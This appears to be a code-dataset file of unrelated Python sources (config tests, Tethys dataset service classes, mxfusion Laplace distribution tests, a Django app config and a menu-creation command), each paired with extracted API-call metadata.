[((77, 100), 'logging.StreamHandler', 'logging.StreamHandler', ([], {}), '()\n', (98, 100), False, 'import logging\n'), ((113, 186), 'logging.Formatter', 'logging.Formatter', (['"""%(asctime)s - %(name)s - %(levelname)s - %(message)s"""'], {}), "('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n", (130, 186), False, 'import logging\n'), ((225, 270), 'logging.getLogger', 'logging.getLogger', (['"""Random Dataset Validator"""'], {}), "('Random Dataset Validator')\n", (242, 270), False, 'import logging\n'), ((1087, 1145), 'src.evaluation.stats.stats_evaluation', 'stats_evaluation', (['classification_test', 'classification_pred'], {}), '(classification_test, classification_pred)\n', (1103, 1145), False, 'from src.evaluation.stats import stats_evaluation\n')]
|
#!/usr/bin/env false
"""TODO: Write
"""
# Internal packages (absolute references, distributed with Python)
# External packages (absolute references, NOT distributed with Python)
# Library modules (absolute references, NOT packaged, in project)
from utility import my_assert as is_
# Project modules (relative references, NOT packaged, in project)
def test_application_name(config):
v = config.application_name
assert is_.nonempty_string(v)
def test_log_directory(config):
v = config.log_directory
assert is_.absolute_path(v)
if v.exists():
assert is_.absolute_directory(v)
def test_log_file(config):
v = config.log_file
assert is_.absolute_path(v)
def test_log_name(config):
v = config.log_name
assert is_.nonempty_string(v)
def test_log_suffix(config):
v = config.log_suffix
assert is_.nonempty_string(v)
def test_pid_file(config):
v = config.pid_file
assert is_.absolute_path(v)
def test_pid_suffix(config):
v = config.pid_suffix
assert is_.nonempty_string(v)
def test_project_directory(config):
v = config.project_directory
assert is_.absolute_directory(v)
def test_temporary_directory(config):
v = config.temporary_directory
assert is_.absolute_directory(v)
"""DisabledContent
"""
|
[
"utility.my_assert.nonempty_string",
"utility.my_assert.absolute_path",
"utility.my_assert.absolute_directory"
] |
[((432, 454), 'utility.my_assert.nonempty_string', 'is_.nonempty_string', (['v'], {}), '(v)\n', (451, 454), True, 'from utility import my_assert as is_\n'), ((529, 549), 'utility.my_assert.absolute_path', 'is_.absolute_path', (['v'], {}), '(v)\n', (546, 549), True, 'from utility import my_assert as is_\n'), ((674, 694), 'utility.my_assert.absolute_path', 'is_.absolute_path', (['v'], {}), '(v)\n', (691, 694), True, 'from utility import my_assert as is_\n'), ((759, 781), 'utility.my_assert.nonempty_string', 'is_.nonempty_string', (['v'], {}), '(v)\n', (778, 781), True, 'from utility import my_assert as is_\n'), ((850, 872), 'utility.my_assert.nonempty_string', 'is_.nonempty_string', (['v'], {}), '(v)\n', (869, 872), True, 'from utility import my_assert as is_\n'), ((937, 957), 'utility.my_assert.absolute_path', 'is_.absolute_path', (['v'], {}), '(v)\n', (954, 957), True, 'from utility import my_assert as is_\n'), ((1026, 1048), 'utility.my_assert.nonempty_string', 'is_.nonempty_string', (['v'], {}), '(v)\n', (1045, 1048), True, 'from utility import my_assert as is_\n'), ((1131, 1156), 'utility.my_assert.absolute_directory', 'is_.absolute_directory', (['v'], {}), '(v)\n', (1153, 1156), True, 'from utility import my_assert as is_\n'), ((1243, 1268), 'utility.my_assert.absolute_directory', 'is_.absolute_directory', (['v'], {}), '(v)\n', (1265, 1268), True, 'from utility import my_assert as is_\n'), ((584, 609), 'utility.my_assert.absolute_directory', 'is_.absolute_directory', (['v'], {}), '(v)\n', (606, 609), True, 'from utility import my_assert as is_\n')]
|
from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES
class DatasetService:
"""
Used to define dataset services for apps.
"""
def __init__(self, name, type, endpoint, apikey=None, username=None, password=None):
"""
Constructor
"""
self.name = name
# Validate the types
if type in VALID_ENGINES:
self.type = type
self.engine = VALID_ENGINES[type]
else:
if len(VALID_ENGINES) > 2:
comma_separated_types = ', '.join('"{0}"'.format(t) for t in VALID_ENGINES.keys()[:-1])
last_type = '"{0}"'.format(VALID_ENGINES.keys()[-1])
valid_types_string = '{0}, and {1}'.format(comma_separated_types, last_type)
elif len(VALID_ENGINES) == 2:
valid_types_string = '"{0}" and "{1}"'.format(VALID_ENGINES.keys()[0], VALID_ENGINES.keys()[1])
else:
valid_types_string = '"{0}"'.format(VALID_ENGINES.keys()[0])
raise ValueError('The value "{0}" is not a valid for argument "type" of DatasetService. Valid values for '
'"type" argument include {1}.'.format(type, valid_types_string))
self.endpoint = endpoint
self.apikey = apikey
self.username = username
self.password = password
def __repr__(self):
"""
String representation
"""
return '<DatasetService: type={0}, api_endpoint={1}>'.format(self.type, self.endpoint)
class SpatialDatasetService:
"""
Used to define spatial dataset services for apps.
"""
def __init__(self, name, type, endpoint, apikey=None, username=None, password=None):
"""
Constructor
"""
self.name = name
# Validate the types
if type in VALID_SPATIAL_ENGINES:
self.type = type
self.engine = VALID_SPATIAL_ENGINES[type]
else:
if len(VALID_SPATIAL_ENGINES) > 2:
comma_separated_types = ', '.join('"{0}"'.format(t) for t in VALID_SPATIAL_ENGINES.keys()[:-1])
last_type = '"{0}"'.format(VALID_SPATIAL_ENGINES.keys()[-1])
valid_types_string = '{0}, and {1}'.format(comma_separated_types, last_type)
elif len(VALID_SPATIAL_ENGINES) == 2:
valid_types_string = '"{0}" and "{1}"'.format(VALID_SPATIAL_ENGINES.keys()[0], VALID_SPATIAL_ENGINES.keys()[1])
else:
valid_types_string = '"{0}"'.format(VALID_SPATIAL_ENGINES.keys()[0])
raise ValueError('The value "{0}" is not a valid for argument "type" of SpatialDatasetService. Valid values for '
'"type" argument include {1}.'.format(type, valid_types_string))
self.endpoint = endpoint
self.apikey = apikey
self.username = username
self.password = password
def __repr__(self):
"""
String representation
"""
return '<SpatialDatasetService: type={0}, api_endpoint={1}>'.format(self.type, self.endpoint)
|
[
"tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys",
"tethys_dataset_services.valid_engines.VALID_ENGINES.keys"
] |
[((671, 691), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (689, 691), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2187, 2215), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2213, 2215), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((894, 914), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (912, 914), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((919, 939), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (937, 939), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((1014, 1034), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (1032, 1034), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2426, 2454), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2452, 2454), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2459, 2487), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2485, 2487), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2562, 2590), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2588, 2590), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((601, 621), 'tethys_dataset_services.valid_engines.VALID_ENGINES.keys', 'VALID_ENGINES.keys', ([], {}), '()\n', (619, 621), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n'), ((2109, 2137), 'tethys_dataset_services.valid_engines.VALID_SPATIAL_ENGINES.keys', 'VALID_SPATIAL_ENGINES.keys', ([], {}), '()\n', (2135, 2137), False, 'from tethys_dataset_services.valid_engines import VALID_ENGINES, VALID_SPATIAL_ENGINES\n')]
|
import pytest
import mxnet as mx
import numpy as np
from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples
from mxfusion.components.distributions import Laplace
from mxfusion.util.testutils import numpy_array_reshape, plot_univariate
from mxfusion.util.testutils import MockMXNetRandomGenerator
from scipy.stats import laplace
@pytest.mark.usefixtures("set_seed")
class TestLaplaceDistribution(object):
@pytest.mark.parametrize(
"dtype, location, location_is_samples, scale, scale_is_samples, rv, rv_is_samples, num_samples", [
(np.float64, np.random.rand(5,3,2), True, np.random.rand(3,2)+0.1, False, np.random.rand(5,3,2), True, 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(5,3,2)+0.1, True, np.random.rand(5,3,2), True, 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(3,2)+0.1, False, np.random.rand(5,3,2), True, 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(3,2)+0.1, False, np.random.rand(3,2), False, 1),
(np.float32, np.random.rand(5,3,2), True, np.random.rand(3,2)+0.1, False, np.random.rand(5,3,2), True, 5),
])
def test_log_pdf(self, dtype, location, location_is_samples, scale, scale_is_samples, rv, rv_is_samples,
num_samples):
is_samples_any = any([location_is_samples, scale_is_samples, rv_is_samples])
rv_shape = rv.shape[1:] if rv_is_samples else rv.shape
n_dim = 1 + len(rv.shape) if is_samples_any and not rv_is_samples else len(rv.shape)
location_np = numpy_array_reshape(location, location_is_samples, n_dim)
scale_np = numpy_array_reshape(scale, scale_is_samples, n_dim)
rv_np = numpy_array_reshape(rv, rv_is_samples, n_dim)
log_pdf_np = laplace.logpdf(rv_np, location_np, scale_np)
var = Laplace.define_variable(shape=rv_shape, dtype=dtype).factor
location_mx = mx.nd.array(location, dtype=dtype)
if not location_is_samples:
location_mx = add_sample_dimension(mx.nd, location_mx)
var_mx = mx.nd.array(scale, dtype=dtype)
if not scale_is_samples:
var_mx = add_sample_dimension(mx.nd, var_mx)
rv_mx = mx.nd.array(rv, dtype=dtype)
if not rv_is_samples:
rv_mx = add_sample_dimension(mx.nd, rv_mx)
variables = {var.location.uuid: location_mx, var.scale.uuid: var_mx, var.random_variable.uuid: rv_mx}
log_pdf_rt = var.log_pdf(F=mx.nd, variables=variables)
assert np.issubdtype(log_pdf_rt.dtype, dtype)
assert array_has_samples(mx.nd, log_pdf_rt) == is_samples_any
if is_samples_any:
assert get_num_samples(mx.nd, log_pdf_rt) == num_samples
if np.issubdtype(dtype, np.float64):
rtol, atol = 1e-7, 1e-10
else:
rtol, atol = 1e-4, 1e-5
assert np.allclose(log_pdf_np, log_pdf_rt.asnumpy(), rtol=rtol, atol=atol)
@pytest.mark.parametrize(
"dtype, location, location_is_samples, scale, scale_is_samples, rv_shape, num_samples", [
(np.float64, np.random.rand(5,3,2), True, np.random.rand(3,2)+0.1, False, (3,2), 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(5,3,2)+0.1, True, (3,2), 5),
(np.float64, np.random.rand(3,2), False, np.random.rand(3,2)+0.1, False, (3,2), 5),
(np.float64, np.random.rand(5,3,2), True, np.random.rand(5,3,2)+0.1, True, (3,2), 5),
(np.float32, np.random.rand(5,3,2), True, np.random.rand(3,2)+0.1, False, (3,2), 5),
])
def test_draw_samples(self, dtype, location, location_is_samples, scale,
scale_is_samples, rv_shape, num_samples):
n_dim = 1 + len(rv_shape)
location_np = numpy_array_reshape(location, location_is_samples, n_dim)
scale_np = numpy_array_reshape(scale, scale_is_samples, n_dim)
rand = np.random.laplace(size=(num_samples,) + rv_shape)
rv_samples_np = location_np + rand * scale_np
rand_gen = MockMXNetRandomGenerator(mx.nd.array(rand.flatten(), dtype=dtype))
var = Laplace.define_variable(shape=rv_shape, dtype=dtype, rand_gen=rand_gen).factor
location_mx = mx.nd.array(location, dtype=dtype)
if not location_is_samples:
location_mx = add_sample_dimension(mx.nd, location_mx)
scale_mx = mx.nd.array(scale, dtype=dtype)
if not scale_is_samples:
scale_mx = add_sample_dimension(mx.nd, scale_mx)
variables = {var.location.uuid: location_mx, var.scale.uuid: scale_mx}
rv_samples_rt = var.draw_samples(F=mx.nd, variables=variables, num_samples=num_samples)
assert np.issubdtype(rv_samples_rt.dtype, dtype)
assert array_has_samples(mx.nd, rv_samples_rt)
assert get_num_samples(mx.nd, rv_samples_rt) == num_samples
if np.issubdtype(dtype, np.float64):
rtol, atol = 1e-7, 1e-10
else:
rtol, atol = 1e-4, 1e-5
assert np.allclose(rv_samples_np, rv_samples_rt.asnumpy(), rtol=rtol, atol=atol)
def test_draw_samples_non_mock(self, plot=False):
# Also make sure the non-mock sampler works
dtype = np.float32
num_samples = 100000
location = np.array([0.5])
scale = np.array([2])
rv_shape = (1,)
location_mx = add_sample_dimension(mx.nd, mx.nd.array(location, dtype=dtype))
scale_mx = add_sample_dimension(mx.nd, mx.nd.array(scale, dtype=dtype))
rand_gen = None
var = Laplace.define_variable(shape=rv_shape, rand_gen=rand_gen, dtype=dtype).factor
variables = {var.location.uuid: location_mx, var.scale.uuid: scale_mx}
rv_samples_rt = var.draw_samples(F=mx.nd, variables=variables, num_samples=num_samples)
assert array_has_samples(mx.nd, rv_samples_rt)
assert get_num_samples(mx.nd, rv_samples_rt) == num_samples
assert rv_samples_rt.dtype == dtype
if plot:
plot_univariate(samples=rv_samples_rt, dist=laplace, loc=location[0], scale=scale[0])
location_est, scale_est = laplace.fit(rv_samples_rt.asnumpy().ravel())
location_tol = 1e-2
scale_tol = 1e-2
assert np.abs(location[0] - location_est) < location_tol
assert np.abs(scale[0] - scale_est) < scale_tol
|
[
"numpy.abs",
"mxfusion.util.testutils.plot_univariate",
"numpy.random.laplace",
"mxfusion.components.variables.runtime_variable.array_has_samples",
"numpy.random.rand",
"mxfusion.components.distributions.Laplace.define_variable",
"scipy.stats.laplace.logpdf",
"numpy.array",
"mxnet.nd.array",
"mxfusion.components.variables.runtime_variable.add_sample_dimension",
"mxfusion.util.testutils.numpy_array_reshape",
"pytest.mark.usefixtures",
"mxfusion.components.variables.runtime_variable.get_num_samples",
"numpy.issubdtype"
] |
[((391, 426), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""set_seed"""'], {}), "('set_seed')\n", (414, 426), False, 'import pytest\n'), ((1594, 1651), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['location', 'location_is_samples', 'n_dim'], {}), '(location, location_is_samples, n_dim)\n', (1613, 1651), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((1671, 1722), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['scale', 'scale_is_samples', 'n_dim'], {}), '(scale, scale_is_samples, n_dim)\n', (1690, 1722), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((1739, 1784), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['rv', 'rv_is_samples', 'n_dim'], {}), '(rv, rv_is_samples, n_dim)\n', (1758, 1784), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((1807, 1851), 'scipy.stats.laplace.logpdf', 'laplace.logpdf', (['rv_np', 'location_np', 'scale_np'], {}), '(rv_np, location_np, scale_np)\n', (1821, 1851), False, 'from scipy.stats import laplace\n'), ((1949, 1983), 'mxnet.nd.array', 'mx.nd.array', (['location'], {'dtype': 'dtype'}), '(location, dtype=dtype)\n', (1960, 1983), True, 'import mxnet as mx\n'), ((2104, 2135), 'mxnet.nd.array', 'mx.nd.array', (['scale'], {'dtype': 'dtype'}), '(scale, dtype=dtype)\n', (2115, 2135), True, 'import mxnet as mx\n'), ((2242, 2270), 'mxnet.nd.array', 'mx.nd.array', (['rv'], {'dtype': 'dtype'}), '(rv, dtype=dtype)\n', (2253, 2270), True, 'import mxnet as mx\n'), ((2545, 2583), 'numpy.issubdtype', 'np.issubdtype', (['log_pdf_rt.dtype', 'dtype'], {}), '(log_pdf_rt.dtype, dtype)\n', (2558, 2583), True, 'import numpy as np\n'), ((2761, 2793), 'numpy.issubdtype', 'np.issubdtype', (['dtype', 'np.float64'], {}), '(dtype, np.float64)\n', (2774, 2793), True, 'import numpy as np\n'), ((3771, 3828), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['location', 'location_is_samples', 'n_dim'], {}), '(location, location_is_samples, n_dim)\n', (3790, 3828), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((3848, 3899), 'mxfusion.util.testutils.numpy_array_reshape', 'numpy_array_reshape', (['scale', 'scale_is_samples', 'n_dim'], {}), '(scale, scale_is_samples, n_dim)\n', (3867, 3899), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((3916, 3965), 'numpy.random.laplace', 'np.random.laplace', ([], {'size': '((num_samples,) + rv_shape)'}), '(size=(num_samples,) + rv_shape)\n', (3933, 3965), True, 'import numpy as np\n'), ((4223, 4257), 'mxnet.nd.array', 'mx.nd.array', (['location'], {'dtype': 'dtype'}), '(location, dtype=dtype)\n', (4234, 4257), True, 'import mxnet as mx\n'), ((4380, 4411), 'mxnet.nd.array', 'mx.nd.array', (['scale'], {'dtype': 'dtype'}), '(scale, dtype=dtype)\n', (4391, 4411), True, 'import mxnet as mx\n'), ((4698, 4739), 'numpy.issubdtype', 'np.issubdtype', (['rv_samples_rt.dtype', 'dtype'], {}), '(rv_samples_rt.dtype, dtype)\n', (4711, 4739), True, 'import numpy as np\n'), ((4755, 4794), 'mxfusion.components.variables.runtime_variable.array_has_samples', 'array_has_samples', (['mx.nd', 'rv_samples_rt'], {}), '(mx.nd, rv_samples_rt)\n', (4772, 4794), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((4875, 4907), 'numpy.issubdtype', 'np.issubdtype', (['dtype', 'np.float64'], {}), '(dtype, np.float64)\n', (4888, 4907), True, 'import numpy as np\n'), ((5268, 5283), 'numpy.array', 'np.array', (['[0.5]'], {}), '([0.5])\n', (5276, 5283), True, 'import numpy as np\n'), ((5300, 5313), 'numpy.array', 'np.array', (['[2]'], {}), '([2])\n', (5308, 5313), True, 'import numpy as np\n'), ((5815, 5854), 'mxfusion.components.variables.runtime_variable.array_has_samples', 'array_has_samples', (['mx.nd', 'rv_samples_rt'], {}), '(mx.nd, rv_samples_rt)\n', (5832, 5854), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((1866, 1918), 'mxfusion.components.distributions.Laplace.define_variable', 'Laplace.define_variable', ([], {'shape': 'rv_shape', 'dtype': 'dtype'}), '(shape=rv_shape, dtype=dtype)\n', (1889, 1918), False, 'from mxfusion.components.distributions import Laplace\n'), ((2046, 2086), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'location_mx'], {}), '(mx.nd, location_mx)\n', (2066, 2086), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((2190, 2225), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'var_mx'], {}), '(mx.nd, var_mx)\n', (2210, 2225), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((2321, 2355), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'rv_mx'], {}), '(mx.nd, rv_mx)\n', (2341, 2355), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((2599, 2635), 'mxfusion.components.variables.runtime_variable.array_has_samples', 'array_has_samples', (['mx.nd', 'log_pdf_rt'], {}), '(mx.nd, log_pdf_rt)\n', (2616, 2635), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((4122, 4193), 'mxfusion.components.distributions.Laplace.define_variable', 'Laplace.define_variable', ([], {'shape': 'rv_shape', 'dtype': 'dtype', 'rand_gen': 'rand_gen'}), '(shape=rv_shape, dtype=dtype, rand_gen=rand_gen)\n', (4145, 4193), False, 'from mxfusion.components.distributions import Laplace\n'), ((4320, 4360), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'location_mx'], {}), '(mx.nd, location_mx)\n', (4340, 4360), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((4468, 4505), 'mxfusion.components.variables.runtime_variable.add_sample_dimension', 'add_sample_dimension', (['mx.nd', 'scale_mx'], {}), '(mx.nd, scale_mx)\n', (4488, 4505), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((4810, 4847), 'mxfusion.components.variables.runtime_variable.get_num_samples', 'get_num_samples', (['mx.nd', 'rv_samples_rt'], {}), '(mx.nd, rv_samples_rt)\n', (4825, 4847), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((5390, 5424), 'mxnet.nd.array', 'mx.nd.array', (['location'], {'dtype': 'dtype'}), '(location, dtype=dtype)\n', (5401, 5424), True, 'import mxnet as mx\n'), ((5473, 5504), 'mxnet.nd.array', 'mx.nd.array', (['scale'], {'dtype': 'dtype'}), '(scale, dtype=dtype)\n', (5484, 5504), True, 'import mxnet as mx\n'), ((5545, 5616), 'mxfusion.components.distributions.Laplace.define_variable', 'Laplace.define_variable', ([], {'shape': 'rv_shape', 'rand_gen': 'rand_gen', 'dtype': 'dtype'}), '(shape=rv_shape, rand_gen=rand_gen, dtype=dtype)\n', (5568, 5616), False, 'from mxfusion.components.distributions import Laplace\n'), ((5870, 5907), 'mxfusion.components.variables.runtime_variable.get_num_samples', 'get_num_samples', (['mx.nd', 'rv_samples_rt'], {}), '(mx.nd, rv_samples_rt)\n', (5885, 5907), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((5997, 6087), 'mxfusion.util.testutils.plot_univariate', 'plot_univariate', ([], {'samples': 'rv_samples_rt', 'dist': 'laplace', 'loc': 'location[0]', 'scale': 'scale[0]'}), '(samples=rv_samples_rt, dist=laplace, loc=location[0], scale\n =scale[0])\n', (6012, 6087), False, 'from mxfusion.util.testutils import numpy_array_reshape, plot_univariate\n'), ((6231, 6265), 'numpy.abs', 'np.abs', (['(location[0] - location_est)'], {}), '(location[0] - location_est)\n', (6237, 6265), True, 'import numpy as np\n'), ((6296, 6324), 'numpy.abs', 'np.abs', (['(scale[0] - scale_est)'], {}), '(scale[0] - scale_est)\n', (6302, 6324), True, 'import numpy as np\n'), ((2700, 2734), 'mxfusion.components.variables.runtime_variable.get_num_samples', 'get_num_samples', (['mx.nd', 'log_pdf_rt'], {}), '(mx.nd, log_pdf_rt)\n', (2715, 2734), False, 'from mxfusion.components.variables.runtime_variable import add_sample_dimension, array_has_samples, get_num_samples\n'), ((625, 648), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (639, 648), True, 'import numpy as np\n'), ((686, 709), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (700, 709), True, 'import numpy as np\n'), ((740, 760), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (754, 760), True, 'import numpy as np\n'), ((801, 824), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (815, 824), True, 'import numpy as np\n'), ((855, 875), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (869, 875), True, 'import numpy as np\n'), ((915, 938), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (929, 938), True, 'import numpy as np\n'), ((969, 989), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (983, 989), True, 'import numpy as np\n'), ((1029, 1049), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (1043, 1049), True, 'import numpy as np\n'), ((1082, 1105), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (1096, 1105), True, 'import numpy as np\n'), ((1143, 1166), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (1157, 1166), True, 'import numpy as np\n'), ((3115, 3138), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3129, 3138), True, 'import numpy as np\n'), ((3208, 3228), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3222, 3228), True, 'import numpy as np\n'), ((3301, 3321), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3315, 3321), True, 'import numpy as np\n'), ((3393, 3416), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3407, 3416), True, 'import numpy as np\n'), ((3487, 3510), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3501, 3510), True, 'import numpy as np\n'), ((654, 674), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (668, 674), True, 'import numpy as np\n'), ((768, 791), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (782, 791), True, 'import numpy as np\n'), ((883, 903), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (897, 903), True, 'import numpy as np\n'), ((997, 1017), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (1011, 1017), True, 'import numpy as np\n'), ((1111, 1131), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (1125, 1131), True, 'import numpy as np\n'), ((3144, 3164), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3158, 3164), True, 'import numpy as np\n'), ((3236, 3259), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3250, 3259), True, 'import numpy as np\n'), ((3329, 3349), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3343, 3349), True, 'import numpy as np\n'), ((3422, 3445), 'numpy.random.rand', 'np.random.rand', (['(5)', '(3)', '(2)'], {}), '(5, 3, 2)\n', (3436, 3445), True, 'import numpy as np\n'), ((3516, 3536), 'numpy.random.rand', 'np.random.rand', (['(3)', '(2)'], {}), '(3, 2)\n', (3530, 3536), True, 'import numpy as np\n')]
|
# -*- encoding: utf-8 -*-
# ======================================================================
"""
Copyright and other protections apply. Please see the accompanying
:doc:`LICENSE <LICENSE>` and :doc:`CREDITS <CREDITS>` file(s) for rights
and restrictions governing use of this software. All rights not
expressly waived or licensed are reserved. If those files are missing or
appear to be modified from their originals, then please contact the
author before viewing or using this software in any capacity.
"""
# ======================================================================
from __future__ import absolute_import, division, print_function
TYPE_CHECKING = False # from typing import TYPE_CHECKING
if TYPE_CHECKING:
import typing # noqa: F401 # pylint: disable=import-error,unused-import,useless-suppression
from builtins import * # noqa: F401,F403 # pylint: disable=redefined-builtin,unused-wildcard-import,useless-suppression,wildcard-import
from future.builtins.disabled import * # noqa: F401,F403 # pylint: disable=no-name-in-module,redefined-builtin,unused-wildcard-import,useless-suppression,wildcard-import
from future.standard_library import install_aliases
install_aliases()
# ---- Imports ---------------------------------------------------------
from gettext import gettext
import django.apps as d_apps
from . import (
LOGGER,
SLACK_VERIFICATION_TOKEN,
)
# ---- Classes ---------------------------------------------------------
# ======================================================================
class EmojiwatchConfig(d_apps.AppConfig):
# ---- Data --------------------------------------------------------
name = 'emojiwatch'
verbose_name = gettext('Emojiwatch')
# ---- Overrides ---------------------------------------------------
def ready(self):
# type: (...) -> None
super().ready() # type: ignore # py2
if not SLACK_VERIFICATION_TOKEN:
LOGGER.critical("EMOJIWATCH['slack_verification_token'] setting is missing")
|
[
"future.standard_library.install_aliases",
"gettext.gettext"
] |
[((1189, 1206), 'future.standard_library.install_aliases', 'install_aliases', ([], {}), '()\n', (1204, 1206), False, 'from future.standard_library import install_aliases\n'), ((1709, 1730), 'gettext.gettext', 'gettext', (['"""Emojiwatch"""'], {}), "('Emojiwatch')\n", (1716, 1730), False, 'from gettext import gettext\n')]
|
from django.core.management.base import BaseCommand
from oms_cms.backend.menu.models import Menu, MenuItem
class Command(BaseCommand):
help = 'Add menu'
def handle(self, *args, **options):
menu = Menu.objects.create(name="Верхнее")
MenuItem.objects.create(title="Главная", name="home", menu=menu, lang_id=1)
MenuItem.objects.create(title="Новости", name="news", menu=menu, lang_id=1)
menu = Menu.objects.create(name="Верхнее 2")
MenuItem.objects.create(title="Контакты", name="contact", menu=menu, lang_id=1)
self.stdout.write('Success menu')
|
[
"oms_cms.backend.menu.models.MenuItem.objects.create",
"oms_cms.backend.menu.models.Menu.objects.create"
] |
